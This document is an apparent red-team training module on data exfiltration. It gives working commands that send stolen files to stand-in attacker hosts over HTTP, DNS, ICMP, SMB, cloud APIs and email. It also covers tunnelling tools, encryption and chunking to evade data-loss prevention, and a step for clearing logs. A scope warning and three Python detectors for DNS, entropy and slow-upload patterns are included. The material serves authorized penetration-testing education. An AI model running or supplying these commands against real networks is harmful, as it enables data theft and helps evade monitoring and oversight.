Data Exfiltration Techniques

Advanced | 35 min | Writeup

Extracting data while evading detection

Learning Objectives

  • Identify valuable data
  • Choose exfiltration methods
  • Evade DLP systems
  • Cover your tracks

You've found the crown jewels - a database dump, confidential documents, or source code. Now you need to get it out. Data exfiltration is the art of extracting data from a compromised network while evading detection.

In real penetration tests, you might just grab a screenshot of sensitive data. But for red team operations or demonstrating data breach impact, actual exfiltration proves the threat is real.

Engagement Scope

Data exfiltration should be explicitly scoped in your engagement. Never exfiltrate actual sensitive data without written permission. Often, proving access and documenting the data is sufficient.

Identifying Valuable Data

Know what to look for:

  • Databases: Customer data, credentials, financial records
  • Source Code: Proprietary applications, configs with secrets
  • Documents: Contracts, HR files, strategic plans
  • Credentials: Password files, SSH keys, certificates
  • Email: Communication, attachments

```bash
# Find interesting files - Linux
find / -name "*.sql" -o -name "*.bak" -o -name "*.dump" 2>/dev/null
find / -name "*.xlsx" -o -name "*.docx" -o -name "*.pdf" 2>/dev/null
find / -type f -size +1M -size -100M 2>/dev/null   # Medium-sized files

# Find interesting files - Windows
dir /s /b *.sql *.bak *.xlsx *.docx *.pst 2>nul
forfiles /P C:\ /S /M *.doc* /D -30 2>nul   # Recent docs
```

HTTP/HTTPS Exfiltration

HTTP is usually allowed through firewalls. HTTPS adds encryption, making inspection harder.

```bash
# Simple HTTP POST (--data-binary keeps the file byte-for-byte; -d strips newlines)
curl -X POST --data-binary @secret.txt http://attacker.com/receive

# Base64 encode first
base64 secret.txt | curl -X POST -d @- http://attacker.com/receive

# Using wget
wget --post-file=secret.txt http://attacker.com/receive

# Python HTTP server: serves GET only and logs request lines; it answers
# POST with 501 and does not store the body
python3 -m http.server 8080
# Same handler class spelled out (still GET only; see the PHP receiver below for saving uploads)
python3 -c "from http.server import HTTPServer, SimpleHTTPRequestHandler; HTTPServer(('0.0.0.0', 8080), SimpleHTTPRequestHandler).serve_forever()"

# PHP receiver script
# <?php file_put_contents("data.txt", file_get_contents("php://input")); ?>

# PowerShell upload (-Raw sends the file as one string instead of an array of lines)
Invoke-WebRequest -Uri http://attacker.com/receive -Method POST -Body (Get-Content secret.txt -Raw)
```

Chunked Exfiltration

```bash
# Split large files
split -b 100K largefile.zip part_

# Send chunks (--data-binary, not -d: -d would strip CR/LF bytes and corrupt the archive)
for f in part_*; do curl -X POST --data-binary @"$f" "http://attacker.com/receive?name=$f"; done

# Reassemble on receiver
cat part_* > largefile.zip
```

DNS Exfiltration

DNS is rarely blocked and often unmonitored. Data is encoded in subdomain queries that your DNS server captures.

```bash
# Encode data as subdomain
# Note: base64 output can contain '+', '/' and '=', which are not valid hostname
# characters, so resolvers may refuse the name; the hex variant avoids this.
data=$(cat secret.txt | base64 | tr -d '\n')
nslookup "$data.exfil.attacker.com"

# Or xxd for hex encoding
data=$(cat secret.txt | xxd -p | tr -d '\n')
nslookup "$data.exfil.attacker.com"

# Chunk for length limits (63 chars per label, 253 total)
cat secret.txt | base64 | fold -w 60 | while read chunk; do
  nslookup "$chunk.exfil.attacker.com"
done

# Using iodine for DNS tunnel
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com   # Server
iodine -f -P password tunnel.attacker.com                # Client

# Using dnscat2
dnscat2-server tunnel.attacker.com   # Server
./dnscat tunnel.attacker.com         # Client
```

DNS is Sneaky

Most organizations don't monitor DNS queries closely. Even if they do, encoded data in subdomains looks like normal (if odd) DNS traffic. Rate limit to avoid suspicion.
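The "if odd" part is exactly what a resolver-log detector keys on. This is an added example, not part of the original writeup: it groups queried names by registered domain and flags domains whose leftmost labels are numerous, long and hex- or base64-looking. The query list is constructed; `attacker.com` and `example.com` are placeholder names.

```python
import re
from collections import defaultdict

# Constructed resolver query log (queried names only); not captured traffic.
SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "cdn.example.com",
    "abcdef0123456789abcdef01.example.com",   # one hash-like label alone is not enough
    "53616c7465645f5f8a1b2c3d4e5f60718293a4b5c6d7e8f9.exfil.attacker.com",
    "0a1b2c3d4e5f60718293a4b5c6d7e8f90011223344556677.exfil.attacker.com",
    "deadbeefcafef00d0123456789abcdef0123456789abcdef.exfil.attacker.com",
    "a1b2c3d4e5f60718293a4b5c6d7e8f900112233445566778.exfil.attacker.com",
]

HEX = re.compile(r"[0-9a-fA-F]+")

def looks_encoded(label: str) -> bool:
    """Heuristic for hex- or base64-looking labels (the two encodings used above)."""
    if len(label) >= 20 and HEX.fullmatch(label):
        return True
    mixed = (any(c.isdigit() for c in label) and any(c.isupper() for c in label)
             and any(c.islower() for c in label))
    return len(label) >= 30 and mixed

def analyze(queries, min_unique=3, min_avg_len=30, min_encoded_fraction=0.5):
    """Group by registered domain; flag domains with many long, encoded-looking
    leftmost labels. Sending slowly does not help: the count covers the whole window."""
    labels_by_domain = defaultdict(set)
    for name in queries:
        labels = name.rstrip(".").split(".")
        if len(labels) < 3:            # no subdomain, nothing to carry data
            continue
        domain = ".".join(labels[-2:]).lower()
        labels_by_domain[domain].add(labels[0])   # keep case: base64 is case-sensitive
    findings = {}
    for domain, labels in labels_by_domain.items():
        avg_len = sum(map(len, labels)) / len(labels)
        encoded = sum(looks_encoded(l) for l in labels) / len(labels)
        if len(labels) >= min_unique and avg_len >= min_avg_len and encoded >= min_encoded_fraction:
            findings[domain] = {"unique_labels": len(labels),
                                "avg_label_len": round(avg_len, 1),
                                "encoded_fraction": round(encoded, 2)}
    return findings

if __name__ == "__main__":
    for domain, stats in analyze(SAMPLE_QUERIES).items():
        print(f"suspicious DNS subdomain pattern: {domain} {stats}")
```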

ICMP Exfiltration

Ping packets can carry data in their payload, and ICMP is often allowed through firewalls for troubleshooting.

```bash
# Using ping with data (16 bytes of hex per line, the maximum -p pattern length)
xxd -p -c 16 secret.txt | while read line; do
  ping -c 1 -p "$line" attacker.com
done

# Using icmpsh (ICMP shell)
# Attacker
icmpsh_m.py attacker_ip target_ip

# Target
icmpsh.exe -t attacker_ip

# Using ptunnel for ICMP tunnel
ptunnel -p proxy_host -lp 8000 -da destination -dp 22   # Client
ptunnel -x password                                      # Server
```

SMB/File Share Exfiltration

```bash
# Copy to attacker SMB share
# First, start SMB server on attacker
impacket-smbserver share /tmp/share -smb2support

# From Windows target
copy secret.txt \\attacker_ip\share\

# From Linux target
smbclient //attacker_ip/share -N -c "put secret.txt"
```

Cloud Service Exfiltration

Legitimate cloud services blend with normal traffic and are rarely blocked.

```bash
# Using cloud storage APIs
# Dropbox
curl -X POST https://content.dropboxapi.com/2/files/upload \
  --header "Authorization: Bearer TOKEN" \
  --header "Dropbox-API-Arg: {\"path\": \"/secret.txt\"}" \
  --data-binary @secret.txt

# AWS S3 (with credentials)
aws s3 cp secret.txt s3://attacker-bucket/

# Google Drive
# Using gdrive CLI tool
gdrive upload secret.txt

# Pastebin (small data); --data-urlencode reads the file and encodes it,
# so '&', '=' and newlines in the content do not break the form body
curl -d "api_dev_key=KEY" -d "api_option=paste" \
  --data-urlencode "api_paste_code@secret.txt" \
  https://pastebin.com/api/api_post.php
```

Leave No Trace

Cloud uploads leave logs on both ends. For covert operations, consider encrypted uploads to services you control, then delete from the cloud.

Email Exfiltration

```bash
# Using sendmail/mail (-A attaches a file with GNU mailutils; bsd-mailx uses -a)
echo "Data attached" | mail -s "Report" -A secret.txt attacker@email.com

# Using Python
python3 << 'EOF'
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

msg = MIMEMultipart()
msg['From'] = "user@company.com"   # send_message() needs a From (or Sender) header
msg['To'] = "attacker@email.com"
msg['Subject'] = "Report"

with open("secret.txt", "rb") as f:
    part = MIMEBase('application', 'octet-stream')
    part.set_payload(f.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', 'attachment', filename="report.txt")
    msg.attach(part)

smtp = smtplib.SMTP('localhost', 25)
smtp.send_message(msg)
EOF

# PowerShell (line continuation is a backtick, not a backslash)
Send-MailMessage -From "user@company.com" -To "attacker@email.com" `
  -Subject "Report" -Attachments "secret.txt" -SmtpServer "mail.company.com"
```

Encryption Before Exfiltration

```bash
# Encrypt with openssl (-pbkdf2 replaces the deprecated default key derivation)
openssl enc -aes-256-cbc -salt -pbkdf2 -in secret.txt -out secret.enc -pass pass:password

# Decrypt on attacker machine (same options, plus -d)
openssl enc -aes-256-cbc -d -pbkdf2 -in secret.enc -out secret.txt -pass pass:password

# Using GPG
gpg -c --cipher-algo AES256 secret.txt   # Symmetric encryption
gpg -d secret.txt.gpg > secret.txt       # Decrypt

# Compress and encrypt (prompts for a passphrase)
tar czf - secret_folder/ | openssl enc -aes-256-cbc -pbkdf2 -out archive.enc

# 7zip with password (Windows)
7z a -pPASSWORD archive.7z secret.txt
```

Always Encrypt

Encrypted data prevents DLP inspection and protects the data during transit. Even if captured, encrypted data is useless without the key.
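Encryption blinds keyword-based DLP, but not content inspection as such: the wrappers above leave recognisable leading bytes, and a body with no known header and near-maximal entropy is itself a signal. This added example (not part of the original writeup) classifies an outbound payload on those two properties. The signatures are taken from the respective file formats, and the gpg entry assumes GnuPG's default v4 symmetric-key packet; the sample payloads are constructed.

```python
import math
from collections import Counter

# Leading bytes written by the wrappers shown above. Assumed from the file-format
# specifications; the gpg entry matches GnuPG's default v4 symmetric-key packet.
SIGNATURES = {
    b"Salted__": "openssl enc with -salt",
    b"\x8c\x0d\x04": "gpg -c (symmetric-key encrypted session key packet)",
    b"7z\xbc\xaf\x27\x1c": "7-Zip archive",
    b"PK\x03\x04": "zip archive",
    b"\x1f\x8b": "gzip stream (tar czf)",
}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: English text lands around 4-5, encrypted or compressed data near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_payload(data: bytes, min_len=256, entropy_threshold=7.2):
    """Return ("wrapper", name), ("high_entropy", bits) or ("plain", None).

    A known container header is the strongest signal; otherwise a body of
    useful size whose entropy is close to 8 bits/byte is worth an alert."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return ("wrapper", name)
    if len(data) >= min_len:
        bits = shannon_entropy(data)
        if bits >= entropy_threshold:
            return ("high_entropy", round(bits, 2))
    return ("plain", None)

if __name__ == "__main__":
    # Constructed payloads: a text memo, an openssl-style header, and a uniform byte blob.
    samples = {
        "memo": b"The quarterly report is attached for review. " * 20,
        "openssl": b"Salted__" + bytes(range(256)),
        "random-looking": bytes(range(256)) * 4,
    }
    for label, body in samples.items():
        print(label, classify_payload(body))
```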

Steganography

Hide data inside innocent-looking files like images.

```bash
# Using steghide
steghide embed -cf image.jpg -ef secret.txt -p password
steghide extract -sf image.jpg -p password

# Simple concatenation
cat image.jpg secret.zip > image_with_data.jpg
# To extract: binwalk -e image_with_data.jpg

# Using outguess
outguess -k "password" -d secret.txt cover.jpg stego.jpg

# Using strings to hide in text
# Encode in whitespace, zero-width characters, etc.
```

Evading Detection

  • Timing: Exfiltrate slowly during business hours
  • Encryption: Prevent content inspection
  • Common Protocols: Use HTTP, DNS, HTTPS
  • Chunking: Small packets blend with normal traffic
  • Legitimate Services: Cloud storage, email
  • Encoding: Base64, hex to avoid pattern matching

Think Like a Defender

What would trigger an alert? Large file transfers, unusual protocols, transfers to known-bad IPs, after-hours activity. Avoid these patterns.
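The mirror image of that list is what a proxy-log detector aggregates: not the size of any one request but the total per source and destination over a long window, plus the run of identically sized bodies that `split -b` produces. This added example (not from the original writeup) runs that aggregation over constructed proxy log lines; `attacker.com`, `crm.example.com` and the addresses are placeholders.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed outbound proxy log: time src method host path request_bytes. Not real traffic.
# 10.0.0.5 sends eleven 100 KiB chunks, one every ~16 minutes, during business hours.
SAMPLE_LOG = """\
2024-05-01T09:02:11 10.0.0.5 POST attacker.com /receive?name=part_aa 102400
2024-05-01T09:17:48 10.0.0.5 POST attacker.com /receive?name=part_ab 102400
2024-05-01T09:33:02 10.0.0.5 POST attacker.com /receive?name=part_ac 102400
2024-05-01T09:49:30 10.0.0.5 POST attacker.com /receive?name=part_ad 102400
2024-05-01T10:05:12 10.0.0.5 POST attacker.com /receive?name=part_ae 102400
2024-05-01T10:21:55 10.0.0.5 POST attacker.com /receive?name=part_af 102400
2024-05-01T10:37:09 10.0.0.5 POST attacker.com /receive?name=part_ag 102400
2024-05-01T10:52:41 10.0.0.5 POST attacker.com /receive?name=part_ah 102400
2024-05-01T11:08:17 10.0.0.5 POST attacker.com /receive?name=part_ai 102400
2024-05-01T11:24:03 10.0.0.5 POST attacker.com /receive?name=part_aj 102400
2024-05-01T11:40:39 10.0.0.5 POST attacker.com /receive?name=part_ak 102400
2024-05-01T09:10:00 10.0.0.7 POST crm.example.com /api/notes 2048
2024-05-01T09:12:30 10.0.0.7 GET crm.example.com /api/notes 0
2024-05-01T14:00:05 10.0.0.7 POST crm.example.com /api/upload 524288
"""

def parse(log):
    for line in log.strip().splitlines():
        ts, src, method, host, path, nbytes = line.split()
        yield datetime.fromisoformat(ts), src, method, host, path, int(nbytes)

def find_slow_uploads(log, window=timedelta(hours=24), byte_limit=1 << 20, min_equal=5):
    """Sum outbound POST bytes per (src, host) over a long window.

    Each chunk stays under any per-request size rule; the running total and the
    run of equal-sized bodies do not. The window is anchored at the pair's first
    POST (a full sliding window is left out for brevity)."""
    posts = defaultdict(list)
    for ts, src, method, host, _path, nbytes in parse(log):
        if method == "POST":
            posts[(src, host)].append((ts, nbytes))
    alerts = {}
    for pair, events in posts.items():
        events.sort()
        start = events[0][0]
        sizes = [b for t, b in events if t - start <= window]
        total, equal = sum(sizes), max(Counter(sizes).values())
        if total >= byte_limit or equal >= min_equal:
            alerts[pair] = {"requests": len(sizes), "bytes": total, "equal_sized": equal}
    return alerts

if __name__ == "__main__":
    for (src, host), stats in find_slow_uploads(SAMPLE_LOG).items():
        print(f"low-and-slow upload: {src} -> {host} {stats}")
```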

Data Exfiltration Methodology

Exfiltration Process

1. Identify: Find valuable data worth exfiltrating
2. Stage: Copy data to a single location
3. Compress: Reduce size with zip/tar
4. Encrypt: Protect data and evade DLP
5. Choose Channel: HTTP, DNS, ICMP, cloud, email
6. Exfiltrate: Send data, possibly in chunks
7. Clean Up: Remove staged files, clear logs

Knowledge Check

Quick Quiz (question 1 of 3)

Why is DNS exfiltration effective?

Challenges

HTTP Exfiltration

Challenge (🌱 beginner)

Set up an HTTP receiver and exfiltrate a file from a compromised Linux system.


DNS Exfiltration

Challenge (🔥 intermediate)

Exfiltrate a small text file using DNS queries to a server you control.


Key Takeaways

  • Always get explicit permission before exfiltrating data
  • HTTP/HTTPS is usually allowed and blends with normal traffic
  • DNS exfiltration is stealthy - rarely blocked or monitored
  • Encrypt data before exfiltration to evade DLP
  • Chunk large files and transfer slowly to avoid detection
  • Cloud services provide legitimate-looking channels
  • Clean up staged files and logs after exfiltration